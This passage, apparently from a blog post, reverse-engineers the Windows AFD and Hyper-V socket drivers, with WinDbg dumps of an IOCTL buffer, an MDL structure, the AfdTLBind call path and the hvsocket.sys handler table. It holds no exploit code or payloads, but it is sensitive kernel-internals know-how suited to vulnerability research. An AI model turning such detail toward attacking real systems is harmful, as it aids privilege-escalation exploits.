<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27506d18 0005000e 00000000 00000024 00000000 ........$.......</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27506d28 00000028 00000000 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00012003</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 (........ ...... - </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">iOCTL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27506d38 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">01223088</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">27de29d0 ffffda85</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> .0"......).'.... </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">UserBuffer , </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">DeviceObject (Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27506d48 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">29a9bcf0 ffffda85</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 ...)............ – </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">FileObject (\Endpoint {Afd})</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At first there is a check of the sizes of entering and proceeding buffers (24 and 28 bytes corresponding) and other parameters. Allocation of a pool of 0x24 in size, and moving to it of the transferred parameters is carried out from usermode.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdx – memmove parameter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0122308c 00000022 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000 00000000 00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> "...............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0122309c </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`012230ac </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b7a9d77</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On the client side the buffer will look so:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`013d38fc 00000022 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6a964317 4a741d87 a646f9ab "....C.j..tJ..F.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`013d390c </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0089049b</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`013d391c </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further there is nt!IoAllocateMdl call (Length eq 0x24)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="87" src="https://lh4.googleusercontent.com/--JAWbY9CrT7ooVn61-lAHucYDLGnkJP4plqy_cBiDgE0lz08sspUL4cMdyZUtP0srQT1rWoyblnL3aA4n3kT-O7wl1W1Vi64NgCFyI7WQENvkc2qS9aUxM6huKs3TkcYSvD3HcFA1xZBQC2fw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="152" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt nt!_MDL @rax – result of execution of IoAllocateMdl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Next : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Size : 0n56</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00a MdlFlags : 0n8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00c AllocationProcessorNumber : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00e Reserved : 0xffff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Process : 0xffffda85`293c9840 _EPROCESS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x018 MappedSystemVa : 0xffff9080`27c4903c Void</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x020 StartVa : 0x00000000`01223000 Void</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x028 ByteCount : 0x24</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x02c ByteOffset : 0x88</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Address of UserBuffer from the DeviceIoControl parameters loaded in rcx, then loading of pages from the pagefile (if pages was swapped) and their blocking in memory by means of nt!MmProbeAndLockPages. For the allocated pool with size 0x24 caching type </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">cached, </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">options HighPagePriority and MdlMappingNoExecute was set by nt!MmMapLockedPagesSpecifyCache.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindSecurity-> afd!AfdTLBind-> afd!AfdTLIoControl (we leave from afd!AfdTLIoControl to afd!AfdTLBindComplete after afd!AfdTLBindComplete2, and only then we return directly to an exit from afd! AfdTLIoControl)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindSecurity: </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The 1st parameter - the same IRP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The 2nd parameter - _AFD_CONNECTION object</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further afd!AfdTlBind (same parameters). </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In afd!AfdTLBind </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="46" src="https://lh4.googleusercontent.com/MYdQUEd4oVBVFgr5ojxrcMNEV3jmb8vH_DCa5YmaiYuMprj3qR3Rk-elCicsyvDyU7yCHt2W8v0Z3lv2IY07-rY6DdRNRSa0anbpRJzaXuRsm5iWu090MubNcgNryfLC2-0nS8X_vMZZ_8ZGKw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="193" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderEndpointDispatch was loaded into rcx before AfdTlBindComplete was load into rax:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="33" src="https://lh4.googleusercontent.com/RT9jIynOgnT9Bxmujp0Kr0oyf06JO2ZPbrTJNxAvYP42Gb6MkrlwMHeKO9-Pd31HP9tA3qYCwcJaKwLsLDLEa_2HyBNQko5WlRMWognUSRymcRopxjj-AdjgiovA7B4rfsbFC6-LJc5GzC4AKQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="373" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dps @rcx L50– tableof hvsocket.sys handlers</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c048 fffff803`db952460 hvsocket!VmbusTlCommonProviderCloseEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c050 fffff803`db963210 hvsocket!VmbusTlEndpointIoControlEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c058 fffff803`db95a8c0 hvsocket!TlDefaultRequestQueryDispatchEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c060 fffff803`db952460 hvsocket!VmbusTlCommonProviderCloseEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c068 fffff803`db963be0 hvsocket!VmbusTlListenerIoControlEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c070 fffff803`db95a8c0 hvsocket!TlDefaultRequestQueryDispatchEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c078 fffff803`db95a8d0 hvsocket!TlDefaultRequestResume</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c080 fffff803`db954300 hvsocket!VmbusTlConnectionCloseEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c088 fffff803`db965fc0 hvsocket!VmbusTlConnectionIoControlEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c090 fffff803`db95a8c0 hvsocket!TlDefaultRequestQueryDispatchEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c098 fffff803`db954c60 hvsocket!VmbusTlConnectionSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0a0 fffff803`db954ea0 hvsocket!VmbusTlConnectionReceive</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0a8 fffff803`db9585a0 hvsocket!VmbusTlConnectionDisconnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0b0 00000001`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0b8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0c0 fffff803`db969de0 hvsocket!VmbusTlXPartAcceptConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0c8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0d0 fffff803`db959830 hvsocket!VmbusTlXPartProcessIoRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0d8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0e0 fffff803`db959890 hvsocket!VmbusTlXPartIoRequestCompleted</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0e8 fffff803`db959950 hvsocket!VmbusTlXPartReleaseReceiveIndications</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0f0 fffff803`db969ee0 hvsocket!VmbusTlXPartDisconnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0f8 fffff803`db959820 hvsocket!VmbusTlXPartSendConsumptionNotice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c100 fffff803`db959940 hvsocket!VmbusTlXPartIsIncomingEmpty</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c108 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c110 00000001`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c118 fffff803`db96a430 hvsocket!VmbusTlLoopbackSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c120 fffff803`db96a6b0 hvsocket!VmbusTlLoopbackAcceptConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c128 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c130 fffff803`db959ed0 hvsocket!VmbusTlLoopbackProcessIoRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c138 fffff803`db96a850 hvsocket!VmbusTlLoopbackPostprocessIoRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c140 fffff803`db959f10 hvsocket!VmbusTlLoopbackIoRequestCompleted</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c148 fffff803`db959f30 hvsocket!VmbusTlLoopbackReleaseReceiveIndications</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c150 fffff803`db95a0c0 hvsocket!VmbusTlLoopbackDisconnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c158 fffff803`db95a340 hvsocket!VmbusTlLoopbackNotifyReceiveConsumed</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c160 fffff803`db95a2f0 hvsocket!VmbusTlLoopbackIsIncomingEmpty</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
